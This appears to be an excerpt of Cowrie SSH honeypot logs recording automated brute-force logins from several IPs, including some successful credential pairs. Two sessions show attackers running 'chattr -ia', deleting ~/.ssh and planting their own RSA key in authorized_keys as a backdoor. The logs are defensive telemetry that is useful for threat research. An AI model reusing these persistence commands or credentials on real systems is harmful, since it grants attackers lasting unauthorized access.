r","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:47:50.361071Z","src_ip":"212.227.235.229","session":"f91c661fb932"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:52.233510Z","src_ip":"212.227.235.229","session":"f91c661fb932"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:52.981056Z","src_ip":"212.227.125.160","session":"b7733a2bcb8a"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:53.484176Z","src_ip":"212.227.235.229","session":"f91c661fb932"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60310,"dst_ip":"1.2.3.4","dst_port":22,"session":"244a360b6628","protocol":"ssh","message":"New connection: 212.227.235.229:60310 (1.2.3.4:22) [session: 244a360b6628]","sensor":"my-vps","timestamp":"2025-08-26T13:47:54.224180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:47:54.228728Z","src_ip":"212.227.235.229","session":"244a360b6628"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:47:54.468127Z","src_ip":"212.227.235.229","session":"244a360b6628"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:47:55.428333Z","src_ip":"212.227.235.229","session":"244a360b6628"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:55.670496Z","src_ip":"212.227.235.229","session":"244a360b6628"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:55.673357Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33081,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c6be53edd5a","protocol":"ssh","message":"New connection: 212.227.235.229:33081 (1.2.3.4:22) [session: 5c6be53edd5a]","sensor":"my-vps","timestamp":"2025-08-26T13:47:55.862912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:47:55.863666Z","src_ip":"212.227.235.229","session":"5c6be53edd5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:47:56.091556Z","src_ip":"212.227.235.229","session":"5c6be53edd5a"}
{"eventid":"cowrie.login.failed","username":"oss","password":"oss","message":"login attempt [oss/oss] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:57.023382Z","src_ip":"212.227.235.229","session":"5c6be53edd5a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:58.258513Z","src_ip":"212.227.235.229","session":"5c6be53edd5a"}
{"eventid":"cowrie.session.closed","duration":"22.9","message":"Connection lost after 22.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:07.191031Z","src_ip":"212.227.125.160","session":"b7733a2bcb8a"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":56798,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d39c4825d9a","protocol":"ssh","message":"New connection: 167.99.49.89:56798 (1.2.3.4:22) [session: 7d39c4825d9a]","sensor":"my-vps","timestamp":"2025-08-26T13:48:13.577536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:48:13.578474Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:48:13.668836Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123-=","message":"login attempt [root/qwe123-=] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.071283Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:48:14.307105Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.307774Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.309074Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.401268Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:48:14.638900Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.639622Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.732132Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.733133Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":56802,"dst_ip":"1.2.3.4","dst_port":22,"session":"952567088123","protocol":"ssh","message":"New connection: 167.99.49.89:56802 (1.2.3.4:22) [session: 952567088123]","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.823685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.824362Z","src_ip":"167.99.49.89","session":"952567088123"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:48:14.915068Z","src_ip":"167.99.49.89","session":"952567088123"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:48:15.320415Z","src_ip":"167.99.49.89","session":"952567088123"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:16.413693Z","src_ip":"167.99.49.89","session":"952567088123"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":56810,"dst_ip":"1.2.3.4","dst_port":22,"session":"02bc5cf1d641","protocol":"ssh","message":"New connection: 167.99.49.89:56810 (1.2.3.4:22) [session: 02bc5cf1d641]","sensor":"my-vps","timestamp":"2025-08-26T13:48:16.502884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:48:16.507066Z","src_ip":"167.99.49.89","session":"02bc5cf1d641"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:48:16.596993Z","src_ip":"167.99.49.89","session":"02bc5cf1d641"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:48:16.958900Z","src_ip":"167.99.49.89","session":"02bc5cf1d641"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:17.050774Z","src_ip":"167.99.49.89","session":"7d39c4825d9a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:48:17.052418Z","src_ip":"167.99.49.89","session":"02bc5cf1d641"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":46412,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1a2986505a8","protocol":"ssh","message":"New connection: 113.141.82.238:46412 (1.2.3.4:22) [session: e1a2986505a8]","sensor":"my-vps","timestamp":"2025-08-26T13:48:57.599784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:48:57.600505Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:48:58.782964Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.login.success","username":"root","password":"2345","message":"login attempt [root/2345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:48:59.512870Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:00.021899Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:00.022597Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:00.023655Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:00.267761Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:01.098186Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:49:01.098927Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:49:01.344909Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:01.345933Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":44056,"dst_ip":"1.2.3.4","dst_port":22,"session":"94b27965cb15","protocol":"ssh","message":"New connection: 113.141.82.238:44056 (1.2.3.4:22) [session: 94b27965cb15]","sensor":"my-vps","timestamp":"2025-08-26T13:49:01.586570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:01.587623Z","src_ip":"113.141.82.238","session":"94b27965cb15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:03.447351Z","src_ip":"113.141.82.238","session":"94b27965cb15"}
